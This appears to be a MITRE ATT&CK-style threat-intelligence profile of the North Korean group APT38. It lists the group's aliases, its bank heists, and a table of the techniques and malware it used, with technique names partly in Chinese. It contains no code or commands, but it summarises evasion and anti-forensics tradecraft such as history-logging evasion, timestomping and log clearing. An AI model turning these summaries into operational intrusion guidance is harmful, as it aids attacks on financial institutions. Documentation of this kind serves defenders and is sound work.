APT38

APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.^[1] Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext ^[2] and Banco de Chile ^[2]; some of their attacks have been destructive.^[1]^[2]^[3]^[4]

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

ID: G0082

ⓘ

Associated Groups: NICKEL GLADSTONE, BeagleBoyz, Bluenoroff, Stardust Chollima, Sapphire Sleet, COPERNICIUM

Contributors: Hiroki Nagahama, NEC Corporation; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India

Version: 3.1

Created: 29 January 2019

Last Modified: 22 January 2025

Associated Group Descriptions

Name	Description
NICKEL GLADSTONE	^[5]
BeagleBoyz	^[1]
Bluenoroff	^[4]
Stardust Chollima	^[6]^[7]
Sapphire Sleet	^[8]
COPERNICIUM	^[8]

Techniques Used

Domain	ID		Name	Use
Enterprise	T1005		从本地系统获取数据	APT38 has collected data from a compromised host.^[1]
Enterprise	T1112		修改注册表	APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys.^[2]
Enterprise	T1543	.003	创建或修改系统进程: Windows Service	APT38 has installed a new Windows service to establish persistence.^[1]
Enterprise	T1115		剪贴板数据	APT38 used a Trojan called KEYLIME to collect data from the clipboard.^[2]
Enterprise	T1059	.001	命令与脚本解释器: PowerShell	APT38 has used PowerShell to execute commands and other operational tasks.^[1]
		.003	命令与脚本解释器: Windows Command Shell	APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.^[2]
		.005	命令与脚本解释器: Visual Basic	APT38 has used VBScript to execute commands and other operational tasks.^[1]
Enterprise	T1562	.003	妨碍防御: Impair Command History Logging	APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.^[1]
		.004	妨碍防御: Disable or Modify System Firewall	APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.^[1]
Enterprise	T1071	.001	应用层协议: Web Protocols	APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.^[2]
Enterprise	T1486		数据加密以实现影响	APT38 has used Hermes ransomware to encrypt files with AES256.^[2]
Enterprise	T1565	.001	数据操控: Stored Data Manipulation	APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.^[2]
		.002	数据操控: Transmitted Data Manipulation	APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.^[2]
		.003	数据操控: Runtime Data Manipulation	APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.^[2]
Enterprise	T1485		数据销毁	APT38 has used a custom secure delete function to make deleted files unrecoverable.^[2]
Enterprise	T1083		文件和目录发现	APT38 have enumerated files and directories, or searched in specific locations within a compromised host.^[1]
Enterprise	T1110		暴力破解	APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.^[1]
Enterprise	T1505	.003	服务器软件组件: Web Shell	APT38 has used web shells for persistence or to ensure redundant access.^[1]
Enterprise	T1106		本机API	APT38 has used the Windows API to execute code within a victim's system.^[1]
Enterprise	T1217		浏览器信息发现	APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.^[1]
Enterprise	T1189		浏览器攻击	APT38 has conducted watering holes schemes to gain initial access to victims.^[2]^[1]
Enterprise	T1027	.002	混淆文件或信息: Software Packing	APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.^[2]
Enterprise	T1204	.002	用户执行: Malicious File	APT38 has attempted to lure victims into enabling malicious macros within email attachments.^[1]
Enterprise	T1561	.002	磁盘擦除: Disk Structure Wipe	APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.^[2]
Enterprise	T1070	.001	移除指标: Clear Windows Event Logs	APT38 clears Window Event logs and Sysmon logs from the system.^[2]
		.004	移除指标: File Deletion	APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.^[2]^[1]
		.006	移除指标: Timestomp	APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.^[1]
Enterprise	T1218	.001	系统二进制代理执行: Compiled HTML File	APT38 has used CHM files to move concealed payloads.^[9]
		.011	系统二进制代理执行: Rundll32	APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.^[1]
Enterprise	T1082		系统信息发现	APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.^[1]
Enterprise	T1529		系统关机/重启	APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.^[2]
Enterprise	T1033		系统所有者/用户发现	APT38 has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users.^[1]
Enterprise	T1569	.002	系统服务: Service Execution	APT38 has created new services or modified existing ones to run executables, commands, or scripts.^[1]
Enterprise	T1049		系统网络连接发现	APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.^[2]
Enterprise	T1135		网络共享发现	APT38 has enumerated network shares on a compromised host.^[1]
Enterprise	T1588	.002	获取能力: Tool	APT38 has obtained and used open-source tools such as Mimikatz.^[10]
Enterprise	T1518	.001	软件发现: Security Software Discovery	APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.^[1]
Enterprise	T1105		输入工具传输	APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.^[2]
Enterprise	T1056	.001	输入捕获: Keylogging	APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.^[2]
Enterprise	T1057		进程发现	APT38 leveraged Sysmon to understand the processes, services in the organization.^[2]
Enterprise	T1566	.001	钓鱼: Spearphishing Attachment	APT38 has conducted spearphishing campaigns using malicious email attachments.^[1]
Enterprise	T1053	.003	预定任务/作业: Cron	APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.^[1]
		.005	预定任务/作业: Scheduled Task	APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.^[1]

Software

ID	Name	References	Techniques
S0334	DarkComet	^[2]	伪装: Match Legitimate Name or Location, 修改注册表, 剪贴板数据, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify System Firewall, 妨碍防御: Disable or Modify Tools, 应用层协议: Web Protocols, 混淆文件或信息: Software Packing, 系统信息发现, 系统所有者/用户发现, 视频捕获, 输入工具传输, 输入捕获: Keylogging, 进程发现, 远程服务: Remote Desktop Protocol, 音频捕获
S0593	ECCENTRICBANDWAGON	^[1]	命令与脚本解释器: Windows Command Shell, 屏幕捕获, 数据分段: Local Data Staging, 混淆文件或信息, 移除指标: File Deletion, 输入捕获: Keylogging
S0376	HOPLIGHT	^[1]	Windows管理规范, 事件触发执行: Windows Management Instrumentation Event Subscription, 代理, 使用备用认证材料: Pass the Hash, 修改注册表, 命令与脚本解释器: Windows Command Shell, 回退信道, 妨碍防御: Disable or Modify System Firewall, 操作系统凭证转储: Security Account Manager, 数据编码: Standard Encoding, 文件和目录发现, 查询注册表, 系统信息发现, 系统时间发现, 系统服务: Service Execution, 设备驱动程序探测, 输入工具传输, 进程注入, 通过C2信道渗出, 非标准端口
S0607	KillDisk	^[10]	Data Destruction, Indicator Removal on Host, Loss of View, Service Stop, 伪装: Masquerade Task or Service, 共享模块, 数据加密以实现影响, 数据销毁, 文件和目录发现, 服务停止, 本机API, 混淆文件或信息, 磁盘擦除: Disk Structure Wipe, 移除指标: Clear Windows Event Logs, 移除指标: File Deletion, 系统信息发现, 系统关机/重启, 访问令牌操控, 进程发现
S0002	Mimikatz	^[2]	从密码存储中获取凭证, 从密码存储中获取凭证: Credentials from Web Browsers, 从密码存储中获取凭证: Windows Credential Manager, 伪造域控制器, 使用备用认证材料: Pass the Hash, 使用备用认证材料: Pass the Ticket, 启动或登录自动启动执行: Security Support Provider, 操作系统凭证转储: DCSync, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: LSA Secrets, 未加密凭证: Private Keys, 窃取或伪造Kerberos票据: Golden Ticket, 窃取或伪造Kerberos票据: Silver Ticket, 窃取或伪造身份认证证书, 访问令牌操控: SID-History Injection, 账号操控
S0039	Net	^[2]	创建账户: Local Account, 创建账户: Domain Account, 密码策略发现, 权限组发现: Domain Groups, 权限组发现: Local Groups, 移除指标: Network Share Connection Removal, 系统时间发现, 系统服务: Service Execution, 系统服务发现, 系统网络连接发现, 网络共享发现, 账号发现: Domain Account, 账号发现: Local Account, 账号操控: Additional Local or Domain Groups, 远程服务: SMB/Windows Admin Shares, 远程系统发现

APT38

Associated Group Descriptions

Enterprise Layer

Techniques Used

Software

References